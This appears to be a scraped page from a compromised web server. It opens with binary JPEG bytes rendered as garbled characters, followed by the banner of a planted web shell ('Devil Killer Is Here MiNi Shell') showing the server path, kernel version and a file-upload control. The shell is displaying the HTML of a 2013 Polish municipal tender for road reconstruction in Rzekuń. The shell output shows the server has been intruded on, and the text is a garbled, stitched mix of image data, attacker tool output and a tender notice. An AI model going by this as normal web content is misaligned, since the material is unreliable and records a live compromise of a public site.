JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/70679-N-2013.html

<p class="kh_header"><b>Rzekuń: ,Przebudowa ul. Pogodnej, Dobrej, Małej, Polnej, Malinowej, Agrestowej, Porzeczkowej, Topolowej i Jaśminowej  w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej oraz przebudowa ul. Leśnej oraz drogi gminnej dz. nr 450 w Czarnowcu gmina Rzekuń z uzupełnieniem brakującej infrastruktury technicznej</b><br>
<b>Numer ogłoszenia: 70679 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rzekuń , ul. Kościuszki 33, 07-411 Rzekuń, woj. mazowieckie, tel. 29 7617301 w. 47, faks 29 7617302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzekun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ,Przebudowa ul. Pogodnej, Dobrej, Małej, Polnej, Malinowej, Agrestowej, Porzeczkowej, Topolowej i Jaśminowej  w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej oraz przebudowa ul. Leśnej oraz drogi gminnej dz. nr 450 w Czarnowcu gmina Rzekuń z uzupełnieniem brakującej infrastruktury technicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
Część 1 zamówienia: Przebudowa ul. Pogodnej na odcinku 111,00 mb., ul. Dobrej na odcinku 98,00 mb., ul. Małej na odcinku 34,50 mb. w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej.
Część 2 zamówienia: Przebudowa ulic: Polnej na odcinku 400,0mb, Malinowej na odcinku 424,00mb, Agrestowej na odcinku 572,00mb i Porzeczkowej na odcinku 204,50mb w miejscowości Rzekuń wraz z uzupełnieniem brakującej infrastruktury technicznej.
Część 3 zamówienia: Przebudowa ul. Leśnej na odcinku 363,40 mb. oraz drogi gminnej dz. nr 450 na odcinku 652,00 mb. w Czarnowcu na terenie Gminy Rzekuń      z uzupełnieniem brakującej infrastruktury technicznej.
Część 4 zamówienia: Przebudowa ul. Topolowej na odcinku o łącznej długości 360,00 z uzupełnieniem brakującej infrastruktury technicznej 
Część 5 zamówienia: ul. Jaśminowej na odcinku 233,00 mb. na terenie Gminy Rzekuń z uzupełnieniem brakującej infrastruktury technicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.11.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:
a) dla części 1 zamówienia w wysokości 3.600,00  zł (słownie: trzy tysiące sześćset złotych i 00/100).
b) dla części 2 zamówienia w wysokości 20 000,00  zł (słownie: dwadzieścia tysięcy i 00/100 złotych).
c)  dla części 3 zamówienia w wysokości 11 000,00  zł (słownie: jedenaście tysięcy i 00/100 złotych).
d)  dla części 4 zamówienia w wysokości 7.500,00 .zł (słownie: siedem tysięcy pięćset złotych  i 00/100 złotych).
e) dla części 5 zamówienia w wysokości 5.000,00 zł (słownie: pięć tysięcy i 00/100 złotych).
2. Wykonawca może wnieść wadium w  jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert dołączając do składanej oferty.
4. Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego: Bank  Spółdzielczy Nr  35 8922 0009 0002 4673 2000 0020
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6. Warunki zwrotu wadium i utraty wadium reguluje art. 46 - Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunków poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, zgodnie z zasadami sztuki budowlanej, wykonali i prawidłowo ukończyli co najmniej: 
dla części 1 zamówienia:
jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi wraz z infrastrukturą techniczną o wartości co najmniej  220.0000,00 złotych brutto;
dla części 2 zamówienia:
jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi wraz z infrastrukturą techniczną o wartości co najmniej 1 200.000,00 złotych brutto;

dla części 3 zamówienia:
jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi wraz z infrastrukturą techniczną o wartości co najmniej 680.0000,00 złotych brutto;
dla części 4 zamówienia:
jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi wraz z infrastrukturą techniczną o wartości co najmniej 450.000,00 złotych brutto;
dla części 5 zamówienia:
jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi wraz z infrastrukturą techniczną o wartości co najmniej 300.000,00 złotych brutto;Wykonawca potwierdza spełnienie warunków poprzez złożenie oświadczenia i wykazu Wzór wykazu stanowi Załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunków poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, w tym:   
		c1) co najmniej jedną osobą pełniącą funkcję kierownika budowy, która posiada 		uprawnienia budowlane w specjalności drogowej,- dla części 1, 2, 3, 4,5
		c2) co najmniej jedną osobą pełniąca funkcje kierownika robót posiadającego  		uprawnienia w specjalności sanitarnej,- dla części 1,2,3,4,5
zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, wraz z opłaconymi składkami ubezpieczenia we właściwej Izbie Samorządu Zawodowego, ze wskazaniem tych osób.
		Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art. 12 a ustawy Prawo budowlane oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r., Nr 63, poz. 394).
W/w osoby powinny posiadać co najmniej trzyletnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalnościach; warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami; Wykonawca potwierdza spełnienie warunków poprzez złożenie oświadczenia i wykazu Wzór wykazu stanowi Załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunków poprzez złożenie oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy; -pełnomocnictwo (w razie potrzeby); -wadium w oryginale (nie dotyczy wadium wniesionego w pieniądzu);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzekun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rzekuniu ul. Kościuszki 33, 07-411 Rzekuń pokój nr 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 10:00, miejsce: Urząd Gminy w Rzekuniu ul. Kościuszki 33, 07-411 Rzekuń pokój nr 20..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ul. Pogodnej na odcinku 111,00 mb., ul. Dobrej na odcinku 98,00 mb., ul. Małej na odcinku 34,50 mb. w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowę ul. Pogodnej, Dobrej i Małej w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej.
a) Niniejsze zadanie obejmuje wykonanie następujących rodzajów robót:
roboty pomiarowe i przygotowawcze;
roboty ziemne związane z wykonaniem odhumusowania, muld trawiastych, korytowaniem; 
roboty rozbiórkowe związane z rozebraniem nawierzchni bitumicznych, z kostki, płytek betonowych;
wykonanie 2 szt., betonowych studzienek ściekowych o śr. 500 mm z osadnikiem;
wykonanie kanału rozsączającego z rur drenarskich perforowanych PVC o śr. 160mm w obsypce żwirem fr. 16/31,50mm w otulinie z geowłókniny;   
regulacja wysokościowa zaworów wodociągowych; 
regulacja wysokościowa włazów kanalizacji sanitarnej;
regulacja wysokościowa zaworów gazowych;
wykonanie warstwy mrozoochronnej z pospółki  zagęszczanej mechanicznie;
wykonanie warstwy podbudowy z kruszywa łamanego zagęszczanego  mechanicznie, fr. 0/31,50mm, pod konstrukcję jezdni;
wykonanie nawierzchni bitumicznej warstwy wiążącej  AC11W;
wykonanie poboczy obustronnych stabilizowanych mechanicznie z kruszywa naturalnego fr. 0  31,50mm;
wykonanie zjazdów na działki z kruszywa łamanego zagęszczanego mechanicznie fr. 0 31,50mm gr. 10cm;
wykonanie ścieku z prefabrykatów betonowych 15x60x50 na ławie betonowej gr. 10cm;
wykonanie umocnienia skarp i dna rowu chodnikowymi płytami betonowymi 35x35x5 cm na podsypce cementowo - piaskowej z umocnieniem dna wylewką betonową gr. 5cm o wym 40x105cm;  
plantowanie powierzchni gruntu rodzimego;
wykonanie oznakowania pionowego;
wykonanie brakującej infrastruktury sanitarnej wg projektu budowlanego, do budowy infrastruktury wodociągowej używać kształtek i uzbrojenia z żeliwa sferoidalnego.
UWAGA: W ramach niniejszego zadania nie przewiduje się wykonania warstwy ścieralnej.W ramach zamówienia dla pięciu części Wykonawca będzie zobowiązany również do: 
udzielenia gwarancji na wykonane roboty budowlane na okres 60 m-cy licząc od dnia końcowego odbioru robót;
prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych;
wykonania na własny koszt wytyczenia trasy drogi, oraz obsługi geodezyjnej; 
wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej zatwierdzonej w PODGiK w 3 egzemplarzach;
przedstawienia do akceptacji przed przystąpieniem do robót aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane; 
przedstawienia protokołów badań gruntu (wskaźnik zagęszczenia);
poniesienia  kosztów opracowania projektu czasowej organizacji ruchu na czas prowadzenia robót;
dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na własny koszt, swoim staraniem i w ramach niniejszego zamówienia;
odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt;
zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie, określonych w ustawie Prawo Budowlane tj. posiadających certyfikat;
zapewnienia przejezdności dróg i utrzymania bezpieczeństwa terenu budowy, oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji;
ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie materiałów o parametrach równoważnych czyli co najmniej takich jak podano w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie gorszych;
zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty; 
Wykonawca zrealizuje roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz specyfikacji istotnych warunków zamówienia.
a) Inne informacje
Zamawiający żąda wykonania nawierzchni bitumicznej jednolitej bezszwowej
Ewentualny nadmiar urobku z korytowania odwieść na miejsce wskazane przez Zamawiającego na terenie Gminy Rzekuń.
Szczegółowy zakres robót do wykonania zawiera SIWZ i załączone do niej projekty budowlane, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz przedmiary robót. Przedmiot zamówienia należy wykonać na podstawie w/w dokumentów zgodnie z obowiązującymi normami, przepisami.
5. Każdy z wykonawców zamówienia może złożyć ofertę na wszystkie części zamówienia lub na jedną z części..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ulic: Polnej na odcinku 400,0mb, Malinowej na odcinku 424,00mb, Agrestowej na odcinku 572,00mb i Porzeczkowej na odcinku 204,50mb w miejscowości Rzekuń wraz z uzupełnieniem brakującej infrastruktury technicznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulic Polnej Malinowej, Agrestowej, Porzeczkowej w miejscowości Rzekuń wraz                                              z uzupełnieniem brakującej infrastruktury technicznej.
a) Niniejsze zadanie obejmuje wykonanie następujących rodzajów robót:
roboty pomiarowe i przygotowawcze;
roboty ziemne związane z wykonaniem odhumusowania, koryta pod warstwy konstrukcyjne, (urobek z korytowania odwieść i zeskładować na miejsce wskazane przez Zamawiającego na terenie Gminy Rzekuń);
